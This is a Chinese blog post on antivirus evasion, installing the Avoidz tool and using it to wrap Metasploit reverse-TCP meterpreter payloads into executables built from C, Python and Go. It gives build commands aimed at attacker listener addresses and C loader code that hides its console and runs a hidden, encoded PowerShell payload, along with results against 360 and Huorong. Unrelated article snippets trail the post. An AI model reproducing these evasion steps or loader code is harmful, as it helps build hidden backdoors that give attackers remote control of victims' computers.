远控免杀专题11-Avoidz免杀

0x01 免杀能力一查表

在这里插入图片描述
几点说明:

1、上表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass。

2、为了更好的对比效果,大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。

3、由于本机测试时只是安装了360全家桶和火绒,所以默认情况下360和火绒杀毒情况指的是静态+动态查杀。360杀毒版本5.0.0.8160(2020.01.01),火绒版本5.0.34.16(2020.01.01),360安全卫士12.0.0.2002(2020.01.01)。

4、其他杀软的检测指标是在virustotal.com(简称VT)上在线查杀,所以可能只是代表了静态查杀能力,数据仅供参考,不足以作为免杀的精确判断指标。

5、完全不必要苛求一种免杀技术能bypass所有杀软,这样的技术肯定是有的,只是没被公开,一旦公开第二天就能被杀了,其实我们只要能bypass目标主机上的杀软就足够了。

0x02 avoidz介绍

Avoidz是一个比较使用比较简单的小工具,利用msf生成powershell的shellocde,然后利用c#、python、go、ruby等语言对shellcode进行编译生成exe而达到免杀的效果,套路比较简单,但免杀效果还算不错。

0x03安装avoidz

avoidz使用是非常简单的,一行命令就可以,但安装比较费劲。因为官方是3年前更新的,里面有些错误,按官方的setup.sh是没法安装成功的。

首先从github上clone到本地


git clone https://github.com/M4sc3r4n0/avoidz

在这里插入图片描述
进入avoidz目录,执行chmod +x setup.sh

执行安装程序./setup.sh

会要求按照ruby、msf、wine、wine-python、wine-pyinstaller、golong等。
在这里插入图片描述

0x04 avoidz使用说明

安装好之后,使用起来非常非常简单,只有四个参数。

  -h, --lhost value                ip_addr|default = 127.0.0.1-p, --lport value                port_number|default = 4444-m, --payload value              payload to use|default = windows/meterpreter/reverse_tcp-f, --format value               output format: c1, c2, cs, py, go

参数说明:

-h msf监听的IP,也就是攻击者的

-p msf监听的端口

-m msf的payload

-f 提供了5种编译格式,三种c/c#,一种python,一种go,都是生成exe文件

默认生成的payload目录为/root/目录下。

0x05 使用avoidz编译C#生成exe

提供3种C代码编译成exe的方式,想了解详情的可以cat avoidz.rb查看具体区别。

我以第一种为例进行测试

./avoidz.rb -h 192.168.142.134 -p 5555 -m windows/meterpreter/reverse_tcp -f c1

这种方式的C代码为

#include <windows.h>
int shellCode(){system("color 63");system("powershell.exe -nop -win Hidden -noni -enc #{powershell_encoded}");/*((Shell Code into the console))*/return 0;
}
void hide(){HWND stealth;AllocConsole();stealth = FindWindowA("ConsoleWindowClass",NULL);ShowWindow (stealth,0);
}
int main(){hide();shellCode();return 0;
}
}

在这里插入图片描述
执行后可正常上线
在这里插入图片描述
开启杀软进行测试,静态测试没问题,行为检测马上露馅。
在这里插入图片描述

0x06 使用avoidz编译python生成exe

使用python生成exe文件

./avoidz.rb -h 10.211.55.2 -p 3333 -m windows/meterpreter/reverse_tcp -f py

静态查杀没问题,行为检测依据被拦
在这里插入图片描述

0x07 使用avoidz编译golang生成exe

使用go生成exe文件

./avoidz.rb -h 10.211.55.2 -p 3333 -m windows/meterpreter/reverse_tcp -f go

go版本的静态查杀都没通过,行为检测依据被拦
在这里插入图片描述

0x07 小结

avoidz的原理还是比较简单的,msfvenom生成powershell的shellcode,然后各种语言编译一下生成exe,静态检测查杀率还算可以,但行为检测就很容易被查杀出来,和TheFatRat具有相同的缺陷。倒是可以借鉴下他的原理,自己写个免杀工具。

0x08 参考

官方使用教程:https://www.youtube.com/watch?v=ZilOByKkrVk

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/380239.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

使用方法实现数组的对调与输出

使用方法实现数组的对调与输出

package asdasqq; import java.util.*; public class asdasdad { public static void main(String[] args) { Scanner wsqnew Scanner(System.in); int qwsq.nextInt();//输入q&#xff0c;表示数组arr的大小&#xff1b; int [] arrnew int [q];//定义一个整型数组arr&a…
阅读更多...
CAP与流密码

CAP与流密码

CAP 中流密码的操作 1 、Cipher 下拉菜单中选中Stream 2&#xff0c;设置LFSR 参数&#xff0c;设置好参数后点击Set Key LFSR Size&#xff1a;表示有几个寄存器 Initial key:寄存器的初始状态&#xff0c;每个寄存器初始值是0或1&#xff0c;放在一起转化成十六进制 Feedbac…
阅读更多...
高性能Javascript 用局部变量缓存集合元素

高性能Javascript 用局部变量缓存集合元素

document.images; 由于集合元素是处于实时状态的实时存在,它与底层dom连接着。在遍历它的每一个属性或length时都会带来查找&#xff0c;从而性能开销很高。 这里是有关集合元素在循环处理时的优化原则 一、用变量缓存集合元素 二、在循环在缓存集合length属性 三、在循环中用变…
阅读更多...
QTP中使用描述性编程

QTP中使用描述性编程

我们简单介绍一下有关功能测试的基本方法&#xff0c;这实际上对于所有自动化功能测试产品来说都是一样的。一般情况下&#xff0c;用QTP来进行功能测试的基本方法主要包括三个主要阶段&#xff1a; 1、创建测试或组建 首先可以通过在应用程序或网站上录制会话&#xff0c;或…
阅读更多...
字符数组的查找法

字符数组的查找法

package asdasqq; import java.util.*; public class suoying { public static void main(String[] args) { Scanner wsqnew Scanner(System.in); System.out.print(“请输入对应的星期范围在一~日&#xff1a;”); int week wsq.nextInt(); System.out.print(getWeek(…
阅读更多...
结构和其他数据形式

结构和其他数据形式

0x01 结构声明 结构声明&#xff08;structure declaration&#xff09;描述了一个结构的组织布局。 struct book{char title[MAXTITL];char author[MAXAUTL];float value; };该声明描述了一个由两个字符数组和一个float类型变量组成的结构。该声明并未创建实际的数据对象&am…
阅读更多...
Java StringBuffer char charAt(int index)方法与示例

Java StringBuffer char charAt(int index)方法与示例

StringBuffer类char charAt(int index) (StringBuffer Class char charAt(int index)) This method is available in package java.lang.StringBuffer.charAt(int index). 软件包java.lang.StringBuffer.charAt(int index)中提供了此方法。 This method is used to return the …
阅读更多...
Form验证

Form验证

代码写 N 久了&#xff0c;总想写得别的。这不&#xff0c;上头说在整合两个项目&#xff0c;做成单一登录&#xff08;Single Sign On&#xff09;&#xff0c;也有人称之为“单点登录”。查阅相关文档后&#xff0c;终于实现了&#xff0c;现在把它拿出来与大家一起分享。或许…
阅读更多...
添加LinkServer的两句代码

添加LinkServer的两句代码

sp_addlinkedserver linkserver,,SQLOLEDB,linkserver.comsp_addlinkedsrvlogin linkserver,false,null,sa,asdf第一句是添加一个名字为linkserver的链接服务器 地址是linkserver.com第二句是针对第一句添加的Linkserver添加一个访问帐号两句不能同时执行 要第一句执行成功后执…
阅读更多...
数组的基本查找

数组的基本查找

package asdasqq; import java.util.*; public class jibenchazhao { public static void main(String[] args) { int [] arr{11,22,33,44,55,66,77}; Scanner wsqnew Scanner(System.in); int qwsq.nextInt();//输入q&#xff0c;即为查找的数&#xff1b; int index g…
阅读更多...
Cobaltstrike4.0系列教程(一)----简介与安装

Cobaltstrike4.0系列教程(一)----简介与安装

0x01-Cobaltstrike简介 Cobalt Strike是一款美国Red Team开发的渗透测试神器&#xff0c;常被业界人称为CS。这款神器许多大佬们都已经玩的很6&#xff0c;我一个菜鸡玩的略有心得&#xff0c;因此写一下自己的Cobaltstrike系列文章&#xff0c;希望给各位一点帮助。 最近这个…
阅读更多...
c ++类成员函数_仅使用C ++创建具有公共数据成员的类

c ++类成员函数_仅使用C ++创建具有公共数据成员的类

c 类成员函数Let’s understand 让我们来了解 What is data member? 什么是数据成员&#xff1f; Any variable declared inside the class in known as data member of the class. 在类内部声明的任何变量&#xff0c;称为类的“数据成员”。 What is public data member…
阅读更多...
转:php.ini中文版

转:php.ini中文版

[PHP] ; PHP还是一个不断发展的工具&#xff0c;其功能还在不断地删减 ; 而php.ini的设置更改可以反映出相当的变化&#xff0c; ; 在使用新的PHP版本前&#xff0c;研究一下php.ini会有好处的 ;;;;;;;;;;;;;;;;;;; ; 关于这个文件 ; ;;;;;;;;;;;;;;;;;;; ; 这个文件控制了PHP许…
阅读更多...
qt 试用 (3)配置编译源代码及调试

qt 试用 (3)配置编译源代码及调试

qt 试用 &#xff08;3&#xff09;配置编译源代码及调试qt creater是一个集成ide&#xff0c;像vc一样容易使用&#xff0c;所以首先下载带qt creater的qt sdk Offline installer - 1.4 GB http://qt.nokia.com/downloads/sdk-windows-cpp-offline这里的lib没有pdb和源代码…
阅读更多...
两数的最大公约数算法基础及优化

两数的最大公约数算法基础及优化

最大公约数算法师从辗转相除法&#xff08;欧几里得算法&#xff09;时间复杂度更相减损术&#xff08;《九章算术》&#xff09;时间复杂度二分化更相减损术思路优化时间复杂度师从 本篇是观Vita君算法视频后总结&#xff0c;他是bilibili一位小up主&#xff1a;小学生Vita君…
阅读更多...
cobaltstrick4.0系列教程(2)---用户接口

cobaltstrick4.0系列教程(2)---用户接口

0x01 概述 Cobalt Strike 用户接口分为两部分。接口的顶部是会话或目标的视觉化展示。接口的底部展示了每个你与之交互的 Cobalt Strike 功能或会话的标签页。你可以点击这两部分之间的区域、按你的喜好重新调整这两个区域的大小。 0x02 工具条 Cobalt Strike 顶部的工具条…
阅读更多...
java类名与文件名_为什么Java文件名必须与公共类名相同?

java类名与文件名_为什么Java文件名必须与公共类名相同?

java类名与文件名The question is that "Can we keep different names for java class name and java file name?" 问题是“我们可以为Java类名和Java文件名保留不同的名称吗&#xff1f;” Yes, we can keep the different name for the java filename and java c…
阅读更多...
玩什么都别玩暧昧

玩什么都别玩暧昧

暧昧 这个介于朋友与情人间的关系 能给予寂寞的人些须安慰与短暂的幸福感 暧昧 没有任何承诺 彼此都不向对方许下诺言 没有甜言蜜语 没有海誓山盟 却在彼此悲伤难过的时候 给予彼此依靠 也许 这种关系是最好的 因为它不虚假 它没有骗人的谎言 因为彼此没有承诺 两个人 可以一起…
阅读更多...
快速幂模

快速幂模

快速幂模简述师从普通思路缺陷一&#xff1a;溢出缺陷二&#xff1a;运算次数多二分化快速幂模简述 计算 ana^nanmod p 师从 本篇是观Vita君算法视频后总结&#xff0c;他是bilibili一位小up主&#xff1a;小学生Vita君 正所谓“生乎吾后&#xff0c;其闻道也亦先乎吾&#…
阅读更多...
《那些年啊,那些事——一个程序员的奋斗史》——31

《那些年啊,那些事——一个程序员的奋斗史》——31

“我们再重新找房吧&#xff1f;”伍定轩对段伏枥说道。“为什么&#xff1f;”段伏枥突然觉得奇怪&#xff0c;为何伍定轩会突然提出这个问题。“你看我的仙人掌。”伍定轩指了指摆在电脑旁边的一盆仙人掌。当初伍定轩决定买这小盆仙人掌的时候&#xff0c;也是从网上听人说&a…
阅读更多...
最新文章

Copyright @ 2022~2023